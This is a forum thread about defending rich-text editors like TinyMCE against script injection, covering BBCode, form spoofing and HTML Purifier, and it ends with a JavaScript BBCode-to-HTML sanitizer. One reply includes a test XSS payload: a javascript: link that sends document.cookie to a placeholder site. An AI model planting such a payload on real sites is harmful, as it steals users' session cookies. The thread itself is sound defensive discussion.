
Hello,
I was reading web security stuff and found that users can inject malicious code, mostly JS, in forms. Now, what about CKFinder/TinyMCE et al.? They obviously produce HTML, and any stripping will destroy the article formatting. Bad enough that they have a "code mode" where the user can enter HTML directly.
Suppose my system is compromised (which is security thinking): what guards can I put in place to ensure minimum damage?
Thanks :)

Last Post by Stefano Mtangoo

They *should* not allow inserting JavaScript, but always try your best at inserting things like

<a href="javascript:location='www.somesite.com?cookies='+document.cookie">nice stuff!!</a>

If this ends up in your site and the editor didn't block it, something is wrong.

Edited by twiss


Set your editors NOT to produce HTML, but some other of the many kinds of enhanced text,
like BBCode, which is used to add [b]bold[/b], code highlighting and text effects in these forums (DaniWeb).
That's why alternate forms exist:
the script handles the code and produces the HTML, so there is no chance of HTML injection.


Be aware that your forms can be spoofed. I could set up a form identical to yours on my server and send it to yours if I know the 'action' attribute value. Even if you try to hide it with ajax, I could find it by printing the js file. So, your protection will come from validating and sanitizing your incoming data. I never presume that POST data actually comes from my site. There are a few things you can try in order to detect an off-site post though, but I don't know how secure these are these days. $_SERVER, etc. It may be possible to spoof these too.


Thanks buddies, I found the HTML Purifier filter. Does anyone know how strong it is? And how do I set my editor to produce BBCode? And how do I convert BBCode to HTML so that I can display it in a browser?
Thanks!
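The BBCode-to-HTML conversion suggested a few posts up (escape everything first, then let only a whitelist of BBCode tags produce markup) and asked about in the last post, as an added example; this is not code from the thread, from DaniWeb, or from any editor or library mentioned. The supported tag subset, the `bbcodeToHtml` and `safeHref` names and the rule that only absolute http(s) URLs become links are my assumptions.

```javascript
// Added example: render a small BBCode subset to HTML without ever letting
// user-supplied HTML through. Step 1 escapes every HTML-significant
// character; step 2 turns only whitelisted BBCode tags into markup, so a
// "<script>" or a javascript: href typed into the editor stays inert text.
function escapeHtml(text) {
  return text
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Only absolute http(s) URLs without whitespace may become a link target;
// anything else (javascript:, data:, relative paths) is refused. Assumption.
function safeHref(url) {
  return /^https?:\/\/[^\s]+$/i.test(url) ? url : null;
}

function bbcodeToHtml(input) {
  // Escape first: from here on the text cannot contain a raw < > " or '.
  let html = escapeHtml(input);

  // Whitelisted formatting tags (case-insensitive, non-greedy).
  html = html.replace(/\[b\]([\s\S]*?)\[\/b\]/gi, '<strong>$1</strong>');
  html = html.replace(/\[i\]([\s\S]*?)\[\/i\]/gi, '<em>$1</em>');

  // [url=target]text[/url]: the target was already entity-escaped, so it
  // cannot close the attribute; safeHref additionally rejects bad schemes.
  html = html.replace(/\[url=([^\]]+)\]([\s\S]*?)\[\/url\]/gi, (match, url, text) => {
    const href = safeHref(url);
    return href ? `<a href="${href}" rel="nofollow">${text}</a>` : match;
  });

  // [url]target[/url] with the target doubling as link text.
  html = html.replace(/\[url\]([^\]]+)\[\/url\]/gi, (match, url) => {
    const href = safeHref(url);
    return href ? `<a href="${href}" rel="nofollow">${href}</a>` : match;
  });

  return html;
}
```

A refused [url] tag is left as the literal (escaped) BBCode so the poster can see why it did not render, rather than being silently dropped.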
